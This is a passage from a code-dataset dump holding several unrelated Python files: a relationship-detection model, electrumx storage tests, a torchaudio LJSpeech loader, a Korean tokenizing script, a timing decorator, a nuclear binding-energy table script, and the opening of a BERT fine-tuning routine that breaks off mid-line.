image_features, boxes, labels)):\n # if evaluating and no objects are detected, return empty tensors\n if not self.training and b.shape[0] == 0:\n dummy_tensor = torch.FloatTensor([[0]])\n if self.cuda_on:\n dummy_tensor = dummy_tensor.cuda()\n vrd_detections.append({'relationships': dummy_tensor, 'relationships_scores': dummy_tensor,\n 'attributes': dummy_tensor, 'attributes_scores': dummy_tensor})\n break\n\n # Hard limit detected objects\n limit = self.max_objects\n how_many = b.size(0)\n if how_many > limit:\n b = b[:limit]\n l = l[:limit]\n if targets is not None:\n targets[idx]['labels'] = targets[idx]['labels'][:limit]\n targets[idx]['relationships'] = targets[idx]['relationships'][:limit, :limit]\n targets[idx]['attributes'] = targets[idx]['attributes'][:limit, :]\n # print('Skipping... too many objects ({})'.format(how_many))\n\n # compute the scale factor between the image dimensions and the feature map dimension\n scale_factor = np.array(img_f.shape[-2:]) / np.array(img.shape[-2:])\n assert scale_factor[0] == scale_factor[1]\n scale = scale_factor[0]\n\n pooled_regions = torchvision.ops.roi_align(img_f.unsqueeze(0), [b],\n output_size=(4, 4), spatial_scale=scale) # K x C x H x W\n\n # Prepare targets if needed (during training)\n t = targets[idx] if self.training else None\n\n vrd_detection_dict = {}\n\n # Train or Infer relationships\n if self.train_relationships:\n out_rel = self.relationships_net(b, l, t, img_f, pooled_regions, img.shape[-2:], scale)\n if self.training:\n # out_rel contains a loss value\n rel_class_loss += out_rel[0]\n rel_relationshipness_loss += out_rel[1]\n else:\n # out_rel contains detections\n vrd_detection_dict = out_rel\n\n # Train or Infer attributes\n if self.train_attributes:\n out_attr = self.attributes_net(b, l, t, img_f, pooled_regions)\n if self.training:\n # out_attr contains a loss value\n attr_loss += out_attr\n else:\n # out_attr contains detections\n vrd_detection_dict.update(out_attr)\n\n if not self.training:\n vrd_detections.append(vrd_detection_dict)\n\n if self.training:\n # Compute the mean losses over all detections for every batch\n #num_objects_total = sum([t['boxes'].size(0) for t in targets])\n attr_loss /= len(images.tensors)\n rel_class_loss /= len(images.tensors)\n rel_relationshipness_loss /= len(images.tensors)\n\n if self.train_relationships:\n losses_dict.update({'relationships_class_loss': self.lam * rel_class_loss})\n losses_dict.update({'relationshipness_loss': rel_relationshipness_loss})\n if self.train_attributes:\n losses_dict.update({'attributes_loss': attr_loss})\n\n return losses_dict\n\n else:\n # Merge boxes, inferred_attr and inferred_rels using the same interface of the detection in torchvision\n detections = [{**obj_det, **vrd_det} for obj_det, vrd_det in zip(detections, vrd_detections)]\n return detections\n\n def cuda(self, device=None):\n self.cuda_on = True\n if self.relationships_net is not None:\n self.relationships_net.cuda()\n if self.attributes_net is not None:\n self.attributes_net.cuda()\n return super().cuda(device)\n\n\n\n\n\n","sub_path":"models/vrd.py","file_name":"vrd.py","file_ext":"py","file_size_in_byte":39427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"648453959","text":"import pytest\nimport os\n\nfrom electrumx.server.storage import Storage, db_class\nfrom electrumx.lib.util import subclasses\n\n# Find out which db engines to test\n# Those that are not installed will be skipped\ndb_engines = []\nfor c in subclasses(Storage):\n try:\n c.import_module()\n except ImportError:\n db_engines.append(pytest.param(c.__name__, marks=pytest.mark.skip))\n else:\n db_engines.append(c.__name__)\n\n\n@pytest.fixture(params=db_engines)\ndef db(tmpdir, request):\n cwd = os.getcwd()\n os.chdir(str(tmpdir))\n db = db_class(request.param)(\"db\", False)\n yield db\n os.chdir(cwd)\n db.close()\n\n\ndef test_put_get(db):\n db.put(b\"x\", b\"y\")\n assert db.get(b\"x\") == b\"y\"\n\n\ndef test_batch(db):\n db.put(b\"a\", b\"1\")\n with db.write_batch() as b:\n b.put(b\"a\", b\"2\")\n assert db.get(b\"a\") == b\"1\"\n assert db.get(b\"a\") == b\"2\"\n\n\ndef test_iterator(db):\n \"\"\"\n The iterator should contain all key/value pairs starting with prefix\n ordered by key.\n \"\"\"\n for i in range(5):\n db.put(b\"abc\" + str.encode(str(i)), str.encode(str(i)))\n db.put(b\"abc\", b\"\")\n db.put(b\"a\", b\"xyz\")\n db.put(b\"abd\", b\"x\")\n assert list(db.iterator(prefix=b\"abc\")) == [(b\"abc\", b\"\")] + [\n (b\"abc\" + str.encode(str(i)), str.encode(str(i))) for\n i in range(5)\n ]\n\n\ndef test_iterator_reverse(db):\n for i in range(5):\n db.put(b\"abc\" + str.encode(str(i)), str.encode(str(i)))\n db.put(b\"a\", b\"xyz\")\n db.put(b\"abd\", b\"x\")\n assert list(db.iterator(prefix=b\"abc\", reverse=True)) == [\n (b\"abc\" + str.encode(str(i)), str.encode(str(i))) for\n i in reversed(range(5))\n ]\n\n\ndef test_iterator_seek(db):\n db.put(b\"first-key1\", b\"val\")\n db.put(b\"first-key2\", b\"val\")\n db.put(b\"first-key3\", b\"val\")\n db.put(b\"key-1\", b\"value-1\")\n db.put(b\"key-5\", b\"value-5\")\n db.put(b\"key-3\", b\"value-3\")\n db.put(b\"key-8\", b\"value-8\")\n db.put(b\"key-2\", b\"value-2\")\n db.put(b\"key-4\", b\"value-4\")\n db.put(b\"last-key1\", b\"val\")\n db.put(b\"last-key2\", b\"val\")\n db.put(b\"last-key3\", b\"val\")\n # forward-iterate, key present, no prefix\n it = db.iterator()\n it.seek(b\"key-4\")\n assert list(it) == [(b\"key-4\", b\"value-4\"), (b\"key-5\", b\"value-5\"), (b\"key-8\", b\"value-8\"),\n (b\"last-key1\", b\"val\"), (b\"last-key2\", b\"val\"), (b\"last-key3\", b\"val\")]\n # forward-iterate, key present\n it = db.iterator(prefix=b\"key-\")\n it.seek(b\"key-4\")\n assert list(it) == [(b\"key-4\", b\"value-4\"), (b\"key-5\", b\"value-5\"),\n (b\"key-8\", b\"value-8\")]\n # forward-iterate, key missing\n it = db.iterator(prefix=b\"key-\")\n it.seek(b\"key-6\")\n assert list(it) == [(b\"key-8\", b\"value-8\")]\n # forward-iterate, after last prefix\n it = db.iterator(prefix=b\"key-\")\n it.seek(b\"key-9\")\n assert list(it) == []\n # forward-iterate, after last, no prefix\n it = db.iterator()\n it.seek(b\"z\")\n assert list(it) == []\n # forward-iterate, no such prefix\n it = db.iterator(prefix=b\"key---\")\n it.seek(b\"key---5\")\n assert list(it) == []\n # forward-iterate, seek outside prefix\n it = db.iterator(prefix=b\"key-\")\n it.seek(b\"last-key2\")\n assert list(it) == []\n # reverse-iterate, key present\n it = db.iterator(prefix=b\"key-\", reverse=True)\n it.seek(b\"key-4\")\n assert list(it) == [(b\"key-3\", b\"value-3\"), (b\"key-2\", b\"value-2\"), (b\"key-1\", b\"value-1\")]\n # reverse-iterate, key missing\n it = db.iterator(prefix=b\"key-\", reverse=True)\n it.seek(b\"key-7\")\n assert list(it) == [(b\"key-5\", b\"value-5\"), (b\"key-4\", b\"value-4\"), (b\"key-3\", b\"value-3\"),\n (b\"key-2\", b\"value-2\"), (b\"key-1\", b\"value-1\")]\n # reverse-iterate, before first prefix\n it = db.iterator(prefix=b\"key-\", reverse=True)\n it.seek(b\"key-0\")\n assert list(it) == []\n # reverse-iterate, before first, no prefix\n it = db.iterator(reverse=True)\n it.seek(b\"a\")\n assert list(it) == []\n # reverse-iterate, no such prefix\n it = db.iterator(prefix=b\"key---\", reverse=True)\n it.seek(b\"key---5\")\n assert list(it) == []\n # reverse-iterate, seek outside prefix\n it = db.iterator(prefix=b\"key-\", reverse=True)\n it.seek(b\"first-key2\")\n assert list(it) == []\n\n\ndef test_close(db):\n db.put(b\"a\", b\"b\")\n db.close()\n db = db_class(db.__class__.__name__)(\"db\", False)\n assert db.get(b\"a\") == b\"b\"\n","sub_path":"tests/server/test_storage.py","file_name":"test_storage.py","file_ext":"py","file_size_in_byte":4443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"377825935","text":"import os\nimport csv\nfrom typing import List, Tuple\n\nimport torchaudio\nfrom torchaudio.datasets.utils import download_url, extract_archive, unicode_csv_reader\nfrom torch import Tensor\nfrom torch.utils.data import Dataset\n\nURL = \"https://data.keithito.com/data/speech/LJSpeech-1.1.tar.bz2\"\nFOLDER_IN_ARCHIVE = \"wavs\"\n_CHECKSUMS = {\n \"https://data.keithito.com/data/speech/LJSpeech-1.1.tar.bz2\":\n \"be1a30453f28eb8dd26af4101ae40cbf2c50413b1bb21936cbcdc6fae3de8aa5\"\n}\n\n\ndef load_ljspeech_item(line: List[str], path: str, ext_audio: str) -> Tuple[Tensor, int, str, str]:\n assert len(line) == 3\n fileid, transcript, normalized_transcript = line\n fileid_audio = fileid + ext_audio\n fileid_audio = os.path.join(path, fileid_audio)\n\n # Load audio\n waveform, sample_rate = torchaudio.load(fileid_audio)\n\n return (\n waveform,\n sample_rate,\n transcript,\n normalized_transcript,\n )\n\n\nclass LJSPEECH(Dataset):\n \"\"\"\n Create a Dataset for LJSpeech-1.1. Each item is a tuple of the form:\n waveform, sample_rate, transcript, normalized_transcript\n \"\"\"\n\n _ext_audio = \".wav\"\n _ext_archive = '.tar.bz2'\n\n def __init__(self,\n root: str,\n url: str = URL,\n folder_in_archive: str = FOLDER_IN_ARCHIVE,\n download: bool = False) -> None:\n\n basename = os.path.basename(url)\n archive = os.path.join(root, basename)\n\n basename = basename.split(self._ext_archive)[0]\n folder_in_archive = os.path.join(basename, folder_in_archive)\n\n self._path = os.path.join(root, folder_in_archive)\n self._metadata_path = os.path.join(root, basename, 'metadata.csv')\n\n if download:\n if not os.path.isdir(self._path):\n if not os.path.isfile(archive):\n checksum = _CHECKSUMS.get(url, None)\n download_url(url, root, hash_value=checksum)\n extract_archive(archive)\n\n with open(self._metadata_path, \"r\") as metadata:\n walker = unicode_csv_reader(metadata, delimiter=\"|\", quoting=csv.QUOTE_NONE)\n self._walker = list(walker)\n\n def __getitem__(self, n: int) -> Tuple[Tensor, int, str, str]:\n line = self._walker[n]\n return load_ljspeech_item(line, self._path, self._ext_audio)\n\n def __len__(self) -> int:\n return len(self._walker)\n","sub_path":"torchaudio/datasets/ljspeech.py","file_name":"ljspeech.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"212836146","text":"import json\nimport pandas as pd\nimport argparse\nfrom konlpy.tag import Mecab\n\n\n# parser 생성\nparser = argparse.ArgumentParser(description='set option')\nparser.add_argument(\"--file_name\", type=str,\n default='service_center',\n help=\"please set file name ex) service_center\")\nargs = parser.parse_args()\nfname = args.file_name\n\n\n# 치환 사전 불러오기\nwith open('/content/drive/Shareddrives/capstone/Elegant_Friends/rsc/clustering_data/'+fname+'/substitution_dict.txt', 'r') as file:\n substitution_dict = json.load(file)\n\n\ndf = pd.read_csv('/content/drive/Shareddrives/capstone/Elegant_Friends/rsc/ELBERT_data/sentiment_analyzed/test.tsv')\ndf['text'] = df['text'].str.upper()\n\nnegative = df[df.label==0]\n\nprint('긍정 및 중립 개수:', len(df))\nprint('부정 개수:', len(negative))\n\n# 단어 치환 하기\nfor key in substitution_dict:\n for word in substitution_dict[key]:\n negative['text'] = negative['text'].str.replace(word, key)\n\n\n# txt 파일로 저장\nnegative['text'].to_csv('/content/drive/Shareddrives/capstone/Elegant_Friends/rsc/clustering_data/service_center/txt/'+fname+'.txt',\n index=False, header=False)\n\n\n# tokenizing 하기\nf = open('/content/drive/Shareddrives/capstone/Elegant_Friends/rsc/clustering_data/service_center/txt/'+fname+'.txt', 'r')\nf2 = open('/content/drive/Shareddrives/capstone/Elegant_Friends/rsc/clustering_data/service_center/tokenized_data/'+fname+'.txt', 'w')\n\nmecab = Mecab()\nlines = f.readlines()[1:]\n\nfor line in lines:\n nouns = mecab.nouns(line)\n f2.write(\" \".join(nouns) + '\\n')\n\nf.close()\nf2.close()\n\n","sub_path":"src/clustering/tokenizing.py","file_name":"tokenizing.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"374154589","text":"\"\"\"\n Автор: Моисеенко Павел, группа № 1, подгруппа № 2.\n\n ВСР 2. Задание: разработать функцию-декоратор, вычисляющую время\n выполнения декорируемой функции.\n\n\"\"\"\n\nfrom datetime import datetime\n\n\ndef lead_time(func):\n def wrapper():\n start = datetime.now()\n result = func()\n print(datetime.now() - start)\n return result\n return wrapper\n\n\n@lead_time\ndef number():\n list_of_numbers = []\n for i in range(10000):\n list_of_numbers.append(i)\n return list_of_numbers\n\n\nprint(number())\n","sub_path":"4-semester/programming/indepworkvar2-1.py","file_name":"indepworkvar2-1.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"335750430","text":"#For calculation of odd values please refer to: http://massexplorer.frib.msu.edu/content/masstables/Odd_Values_from_Even_Data.pdf\n\ndef readFile(DataFileIn,DataFileOut):\n # These are the locations of Neutron #, Proton #, Binding Energy, Neutron pairing energy, Proton pairing energy in the RMF mass table files from: \"Global performance of covariant energy density functionals: Ground state observables of even-even nuclei and the estimate of theoretical uncertainties\", Physical Review C 89, 054320 (2014)\n an = 1\n az = 0\n ae = 3\n apn = 6\n apz = 7\n CC = 13 #define padding for each colomn\n f1 = open(str(DataFileIn))\n output = open(str(DataFileOut), \"w\")\n lines = f1.readlines()\n BindE={} #Creates an empty dictionary for binding energy\n PairN = {} #Creates an empty dictionary for neutron pairing gap\n PairZ = {} #Creates an empty dictionary for proton pairing gap\n S1p = {} #Creates an empty dictionary for 1 proton separation energy\n S2p = {} #Creates an empty dictionary for 2 proton separation energy\n S1n = {} #Creates an empty dictionary for 1 neutron separation energy\n S2n = {} #Creates an empty dictionary for 2 neutron separation energy\n Qa = {} #Creates an empty dictionary for Q_alpha value (Q value for alpha decay)\n # function that detects if arg. is a number\n outputStr = \"Z\".ljust(5) + \"N\".ljust(5) + \"Binding_E_(MeV)\".ljust(CC+5) + \"S_1p_(MeV)\".ljust(CC) + \"S_2p_(MeV)\".ljust(CC) + \"S_1n_(MeV)\".ljust(CC) + \"S_2n_(MeV)\".ljust(CC) + \"Q_alpha_(MeV)\".ljust(CC)\n output.write(outputStr)\n def isNum(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n nMax = 2\n zMax = 2\n for line in lines:\n ss = line.split()\n #print(ss)\n try:\n N = int(float(ss[int(an)])+0.0001) #Number of Neutrons\n nThis = N\n Z = int(float(ss[int(az)])+0.0001) #Number of Protons\n zThis = Z\n if (nThis > nMax):\n nMax = nThis\n if (zThis > zMax):\n zMax = zThis\n BindE[(N,Z)] = float(ss[int(ae)]) #Binding Energy Dict\n PairN[(N,Z)] = -float(ss[int(apn)])\n PairZ[(N,Z)] = -float(ss[int(apz)])\n # For each even-even data on file, the following computes binding energies of its neighbours as follows:\n # (Z-1,N-1) * * (Z-1, N)\n # \\ |\n # \\ |\n # (Z, N-1) * --- * (even Z,even N)\n #\n #Compute Odd-Z Even-N Binding energies\n if (BindE.has_key((N,Z)) and BindE.has_key((N,Z-2)) and PairZ.has_key((N,Z)) and PairZ.has_key((N,Z-2)) ):\n BindE[(N,Z-1)] = 0.5 * ( BindE[(N,Z)] + BindE[(N,Z-2)] + PairZ[(N,Z)] + PairZ[(N,Z-2)] )\n #Compute Even-Z Odd-N Binding energies\n if (BindE.has_key((N,Z)) and BindE.has_key((N-2,Z)) and PairN.has_key((N,Z)) and PairN.has_key((N-2,Z)) ):\n BindE[(N-1,Z)] = 0.5 * ( BindE[(N,Z)] + BindE[(N-2,Z)] + PairN[(N,Z)] + PairN[(N-2,Z)] )\n #Compute Odd-N Proton Pairing gaps, this is required for Odd-Z Odd-N Binding energies computation\n if (PairZ.has_key((N,Z)) and PairZ.has_key((N-2,Z))):\n PairZ[(N-1,Z)] = 0.5 * ( PairZ[(N,Z)] + PairZ[(N-2,Z)] )\n #Compute Odd-Z Odd-N Binding energies, this code works because the mass table is ordered in Proton number first, thus the complete Z-2 data is guaranteed to exist when the following lines are executed\n if ( BindE.has_key((N-1,Z)) and BindE.has_key((N-1,Z-2)) and PairZ.has_key((N-1,Z)) and PairZ.has_key((N-1,Z-2)) ):\n BindE[(N-1,Z-1)] = 0.5 * ( BindE[(N-1,Z)] + BindE[(N-1,Z-2)] + PairZ[(N-1,Z)] + PairZ[N-1,Z-2] )\n #!!!\n #!!! Upon this point, all odd-odd, odd-even, even-odd Binding energies are computed and stored !!!\n #!!!\n except (ValueError, IndexError): #N,Z, or, BE are not numbers\n continue\n for Z in range(2,zMax+1):\n for N in range(2,nMax+1):\n if ( BindE.has_key((N,Z)) ):\n outputStr = \"\\n\" + str(Z).ljust(5) + str(N).ljust(5) + str(BindE[(N,Z)]).ljust(CC+5)\n if ( BindE.has_key((N,Z-1)) ):\n S1p[(N,Z)] = BindE[(N,Z-1)] - BindE[(N,Z)]\n outputStr = outputStr + str( round( S1p[(N,Z)]+0.00000001,6 ) ).ljust(CC)\n else:\n outputStr = outputStr + \"*\".ljust(CC)\n if ( BindE.has_key((N,Z-2)) ):\n S2p[(N,Z)] = BindE[(N,Z-2)] - BindE[(N,Z)]\n outputStr = outputStr + str( round( S2p[(N,Z)]+0.00000001,6 ) ).ljust(CC)\n else:\n outputStr = outputStr + \"*\".ljust(CC)\n if ( BindE.has_key((N-1,Z)) ):\n S1n[(N,Z)] = BindE[(N-1,Z)] - BindE[(N,Z)]\n outputStr = outputStr + str( round( S1n[(N,Z)]+0.00000001,6 ) ).ljust(CC)\n else:\n outputStr = outputStr + \"*\".ljust(CC)\n if ( BindE.has_key((N-2,Z)) ):\n S2n[(N,Z)] = BindE[(N-2,Z)] - BindE[(N,Z)]\n outputStr = outputStr + str( round( S2n[(N,Z)]+0.00000001,6 ) ).ljust(CC)\n else:\n outputStr = outputStr + \"*\".ljust(CC)\n if ( BindE.has_key((N-2,Z-2)) ):\n Qa[(N,Z)] = 28.3 + BindE[(N,Z)] - BindE[(N-2,Z-2)]\n outputStr = outputStr + str( round( Qa[(N,Z)]+0.00000001,6 ) ).ljust(CC)\n else:\n outputStr = outputStr + \"*\".ljust(CC)\n output.write(outputStr)\n\n f1.close()\n output.close()\n\n\nDataFileIn='RMFnoHeader/ddme2-tableNH.dat'\nDataFileOut='RMFCompleteTable/ddme2-sep.dat'\nreadFile(DataFileIn,DataFileOut) #arg: (DataFileIn,DataFileOut)\n\nDataFileIn='RMFnoHeader/ddmed-tableNH.dat'\nDataFileOut='RMFCompleteTable/ddmed-sep.dat'\nreadFile(DataFileIn,DataFileOut) #arg: (DataFileIn,DataFileOut)\n\nDataFileIn='RMFnoHeader/ddpc1-tableNH.dat'\nDataFileOut='RMFCompleteTable/ddpc1-sep.dat'\nreadFile(DataFileIn,DataFileOut) #arg: (DataFileIn,DataFileOut)\n\nDataFileIn='RMFnoHeader/nl3s-tableNH.dat'\nDataFileOut='RMFCompleteTable/nl3s-sep.dat'\nreadFile(DataFileIn,DataFileOut) #arg: (DataFileIn,DataFileOut)\n\n","sub_path":"neutron_dripline/S2n_Residuals_no_dripline/data_modify/RMF_data_mod/RMF_S2_mod.py","file_name":"RMF_S2_mod.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"117783899","text":"from transfer.downstream.finetune.env.imports import pdb, OrderedDict, json, torch, re, np, SummaryWriter, time, os, sys, git\nfrom transfer.downstream.finetune.io_.logger import printing\nfrom transfer.downstream.finetune.env.gpu_tools.gpu_info import use_gpu_, printout_allocated_gpu_memory\n\nfrom transfer.downstream.finetune.env.flags import REPORT_FLAG_DIR_STR\nfrom transfer.downstream.finetune.io_.manage_dirs.make_dirs import setup_repoting_location\nfrom transfer.downstream.finetune.model.optimization.get_optmizers import apply_fine_tuning_strategy\n\ntry:\n from transfer.downstream.finetune.io_.runs_tracker.google_sheet_report import update_status\nexcept:\n update_status = None\n\nfrom transfer.downstream.finetune.io_.data_iterator import readers_load, data_gen_multi_task_sampling_batch\nfrom transfer.downstream.finetune.io_.dat import conllu_data\n\nfrom transfer.downstream.finetune.io_.build_files_shard import build_shard\nfrom transfer.downstream.finetune.io_.get_new_batcher import get_new_shard\n\nfrom transfer.downstream.finetune.trainer.tools.multi_task_tools import get_vocab_size_and_dictionary_per_task, update_batch_size_mean\nfrom transfer.downstream.finetune.trainer.epoch_run import epoch_run\nfrom transfer.downstream.finetune.model.architecture.get_model import get_model_multi_task_bert\nfrom transfer.downstream.finetune.io_.report.report_tools import write_args, get_hyperparameters_dict, get_dataset_label, get_name_model_id_with_extra_name\n\nfrom transfer.downstream.finetune.env.dir.project_directories import CHECKPOINT_BERT_DIR\nfrom transfer.downstream.finetune.env.vars import N_SENT_MAX_CONLL_PER_SHARD\nfrom transfer.downstream.finetune.model.settings import TASKS_PARAMETER\nfrom transfer.downstream.finetune.transformers.transformers.tokenization_bert import BertTokenizer\nfrom transfer.downstream.finetune.transformers.transformers.tokenization_xlm import XLMTokenizer\n\n\ndef run(args,\n n_observation_max_per_epoch_train,\n vocab_size, model_dir,\n voc_tokenizer, auxilliary_task_norm_not_norm,\n null_token_index, null_str, tokenizer,\n n_observation_max_per_epoch_dev_test=None,\n run_mode=\"train\",\n dict_path=None, end_predictions=None,\n report=True,\n model_suffix=\"\", description=\"\",\n saving_every_epoch=10,\n model_location=None, model_id=None,\n report_full_path_shared=None, skip_1_t_n=False,\n heuristic_test_ls=None,\n remove_mask_str_prediction=False, inverse_writing=False,\n extra_label_for_prediction=\"\",\n random_iterator_train=True, bucket_test=False, must_get_norm_test=True,\n early_stoppin_metric=None, subsample_early_stoping_metric_val=None,\n compute_intersection_score_test=True,\n threshold_edit=3,\n name_with_epoch=False,max_token_per_batch=200,\n encoder=None,\n debug=False, verbose=1):\n\n \"\"\"\n Wrapper for training/prediction/evaluation\n\n 2 modes : train (will train using train and dev iterators with test at the end on test_path)\n test : only test at the end : requires all directories to be created\n :return:\n \"\"\"\n assert run_mode in [\"train\", \"test\"], \"ERROR run mode {} corrupted \".format(run_mode)\n input_level_ls = [\"wordpiece\"]\n assert early_stoppin_metric is not None and subsample_early_stoping_metric_val is not None, \"ERROR : assert early_stoppin_metric should be defined and subsample_early_stoping_metric_val \"\n if n_observation_max_per_epoch_dev_test is None:\n n_observation_max_per_epoch_dev_test = n_observation_max_per_epoch_train\n printing(\"MODEL : RUNNING IN {} mode\", var=[run_mode], verbose=verbose, verbose_level=1)\n printing(\"WARNING : casing was set to {} (this should be consistent at train and test)\", var=[args.case], verbose=verbose, verbose_level=2)\n\n if len(args.tasks) == 1:\n printing(\"INFO : MODEL : 1 set of simultaneous tasks {}\".format(args.tasks), verbose=verbose, verbose_level=1)\n\n if run_mode == \"test\":\n assert args.test_paths is not None and isinstance(args.test_paths, list)\n if run_mode == \"train\":\n printing(\"CHECKPOINTING info : \"\n \"saving model every {}\", var=saving_every_epoch, verbose=verbose, verbose_level=1)\n\n use_gpu = use_gpu_(use_gpu=None, verbose=verbose)\n\n def get_commit_id():\n repo = git.Repo(os.path.dirname(os.path.realpath(__file__)), search_parent_directories=True)\n git_commit_id = str(repo.head.commit) # object.hexsha\n return git_commit_id\n if verbose>1:\n print(f\"GIT ID : {get_commit_id()}\")\n\n train_data_label = get_dataset_label(args.train_path, default=\"train\")\n\n iter_train = 0\n iter_dev = 0\n row = None\n writer = None\n\n printout_allocated_gpu_memory(verbose, \"{} starting all\".format(model_id))\n\n if run_mode == \"train\":\n if os.path.isdir(args.train_path[0]) and len(args.train_path) == 1:\n data_sharded = args.train_path[0]\n printing(\"INFO args.train_path is directory so not rebuilding shards\", verbose=verbose, verbose_level=1)\n elif os.path.isdir(args.train_path[0]):\n raise(Exception(\" {} is a directory but len is more than one , not supported\".format(args.train_path[0], len(args.train_path))))\n else:\n data_sharded = None\n assert model_location is None and model_id is None, \"ERROR we are creating a new one \"\n\n model_id, model_location, dict_path, tensorboard_log, end_predictions, data_sharded \\\n = setup_repoting_location(model_suffix=model_suffix, data_sharded=data_sharded,\n root_dir_checkpoints=CHECKPOINT_BERT_DIR,\n shared_id=args.overall_label, verbose=verbose)\n hyperparameters = get_hyperparameters_dict(args, args.case, random_iterator_train, seed=args.seed, verbose=verbose,\n dict_path=dict_path,\n model_id=model_id, model_location=model_location)\n args_dir = write_args(model_location, model_id=model_id, hyperparameters=hyperparameters, verbose=verbose)\n\n if report:\n if report_full_path_shared is not None:\n tensorboard_log = os.path.join(report_full_path_shared, \"tensorboard\")\n printing(\"tensorboard --logdir={} --host=localhost --port=1234 \", var=[tensorboard_log], verbose_level=1,verbose=verbose)\n writer = SummaryWriter(log_dir=tensorboard_log)\n if writer is not None:\n writer.add_text(\"INFO-ARGUMENT-MODEL-{}\".format(model_id), str(hyperparameters), 0)\n else:\n args_checkpoint = json.load(open(args.init_args_dir, \"r\"))\n dict_path = args_checkpoint[\"hyperparameters\"][\"dict_path\"]\n assert dict_path is not None and os.path.isdir(dict_path), \"ERROR {} \".format(dict_path)\n end_predictions = args.end_predictions\n assert end_predictions is not None and os.path.isdir(end_predictions), \"ERROR end_predictions\"\n model_location = args_checkpoint[\"hyperparameters\"][\"model_location\"]\n model_id = args_checkpoint[\"hyperparameters\"][\"model_id\"]\n assert model_location is not None and model_id is not None, \"ERROR model_location model_id \"\n args_dir = os.path.join(model_location, \"{}-args.json\".format(model_id))\n\n printing(\"CHECKPOINTING : starting writing log \\ntensorboard --logdir={} --host=localhost --port=1234 \",\n var=[os.path.join(model_id, \"tensorboard\")], verbose_level=1,\n verbose=verbose)\n\n # build or make dictionaries\n _dev_path = args.dev_path if args.dev_path is not None else args.train_path\n word_dictionary, word_norm_dictionary, char_dictionary, pos_dictionary, \\\n xpos_dictionary, type_dictionary = \\\n conllu_data.load_dict(dict_path=dict_path,\n train_path=args.train_path if run_mode == \"train\" else None,\n dev_path=args.dev_path if run_mode == \"train\" else None,\n test_path=None,\n word_embed_dict={},\n dry_run=False,\n expand_vocab=False,\n word_normalization=True,\n force_new_dic=True if run_mode == \"train\" else False,\n tasks=args.tasks,\n pos_specific_data_set=args.train_path[1] if len(args.tasks) > 1 and len(args.train_path)>1 and \"pos\" in args.tasks else None,\n case=args.case,\n # if not normalize pos or parsing in tasks we don't need dictionary\n do_not_fill_dictionaries=len(set([\"normalize\", \"pos\", \"parsing\"])&set([task for tasks in args.tasks for task in tasks])) == 0,\n add_start_char=1 if run_mode == \"train\" else None,\n verbose=verbose)\n # we flatten the taskssd\n printing(\"DICTIONARY CREATED/LOADED\", verbose=verbose, verbose_level=1)\n num_labels_per_task, task_to_label_dictionary = get_vocab_size_and_dictionary_per_task([task for tasks in args.tasks for task in tasks],\n vocab_bert_wordpieces_len=vocab_size,\n pos_dictionary=pos_dictionary,\n type_dictionary=type_dictionary,\n task_parameters=TASKS_PARAMETER)\n voc_pos_size = num_labels_per_task[\"pos\"] if \"pos\" in args.tasks else None\n if voc_pos_size is not None:\n printing(\"MODEL : voc_pos_size defined as {}\", var=voc_pos_size, verbose_level=1, verbose=verbose)\n printing(\"MODEL init...\", verbose=verbose, verbose_level=1)\n if verbose>1:\n print(\"DEBUG : TOKENIZER :voc_tokenizer from_pretrained\", voc_tokenizer)\n #pdb.set_trace()\n #voc_tokenizer = \"bert-base-multilingual-cased\"\n tokenizer = tokenizer.from_pretrained(voc_tokenizer, do_lower_case=args.case == \"lower\",shuffle_bpe_embedding=args.shuffle_bpe_embedding)\n mask_id = tokenizer.convert_tokens_to_ids(tokenizer.mask_token) #convert_tokens_to_ids([MASK_BERT])[0]\n printout_allocated_gpu_memory(verbose, \"{} loading model \".format(model_id))\n model = get_model_multi_task_bert(args=args, model_dir=model_dir, encoder=encoder,\n num_labels_per_task=num_labels_per_task, mask_id=mask_id)\n\n def prune_heads(prune_heads):\n if prune_heads is not None:\n pune_heads_ls = prune_heads.split(\",\")[:-1]\n assert len(pune_heads_ls) > 0\n for layer in pune_heads_ls:\n parsed_layer_to_prune =layer.split(\"-\")\n assert parsed_layer_to_prune[0] == \"prune_heads\"\n assert parsed_layer_to_prune[1] == \"layer\"\n assert parsed_layer_to_prune[3] == \"heads\"\n heads = parsed_layer_to_prune[4]\n head_index_ls = heads.split(\"_\")\n heads_ls = [int(index) for index in head_index_ls]\n print(f\"MODEL : pruning layer {parsed_layer_to_prune[2]} heads {heads_ls}\")\n model.encoder.encoder.layer[int(parsed_layer_to_prune[2])].attention.prune_heads(heads_ls)\n if args.prune_heads is not None and args.prune_heads!=\"None\":\n print(f\"INFO : args.prune_heads {args.prune_heads}\")\n prune_heads(args.prune_heads)\n\n if use_gpu:\n model.to(\"cuda\")\n printing(\"MODEL TO CUDA\", verbose=verbose, verbose_level=1)\n printing(\"MODEL model.config {} \", var=[model.config], verbose=verbose, verbose_level=1)\n printout_allocated_gpu_memory(verbose, \"{} model loaded\".format(model_id))\n model_origin = OrderedDict()\n pruning_mask = OrderedDict()\n printout_allocated_gpu_memory(verbose, \"{} model cuda\".format(model_id))\n for name, param in model.named_parameters():\n model_origin[name] = param.detach().clone()\n printout_allocated_gpu_memory(verbose, \"{} param cloned \".format(name))\n if args.penalization_mode == \"pruning\":\n abs = torch.abs(param.detach().flatten())\n median_value = torch.median(abs)\n pruning_mask[name] = (abs > median_value).float()\n printout_allocated_gpu_memory(verbose, \"{} pruning mask loaded\".format(model_id))\n\n printout_allocated_gpu_memory(verbose, \"{} model clone\".format(model_id))\n\n inv_word_dic = word_dictionary.instance2index\n # load , mask, bucket and index data\n\n assert tokenizer is not None, \"ERROR : tokenizer is None , voc_tokenizer failed to be loaded {}\".format(voc_tokenizer)\n if run_mode == \"train\":\n time_load_readers_train_start = time.time()\n if not args.memory_efficient_iterator:\n\n data_sharded, n_shards, n_sent_dataset_total_train = 